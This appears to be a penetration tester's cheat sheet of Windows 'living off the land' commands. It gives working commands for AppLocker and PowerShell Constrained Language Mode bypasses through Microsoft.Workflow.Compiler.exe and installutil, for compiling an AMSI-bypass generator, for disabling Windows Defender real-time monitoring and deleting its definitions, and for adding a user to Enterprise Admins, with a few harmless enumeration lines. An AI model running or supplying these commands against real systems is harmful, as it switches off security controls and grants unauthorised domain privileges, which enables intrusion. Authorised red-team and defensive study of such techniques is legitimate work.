% lolbin

# applocker bypass
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml

# applocker powershell CLM bypass
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass.exe

# offline bypass amsi generator
sudo mcs /opt/win/AMSIFailGenerator.cs && sudo mono /opt/win/AMSIFailGenerator.exe

# disable defender
Set-MpPreference -DisableRealtimeMonitoring $true
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

# forest enterprise privesc
net group "Enterprise Admins" /add /domain

# windows /etc/hosts
type c:\Windows\System32\Drivers\etc\hosts

# permissions
icacls C:\<PATH>
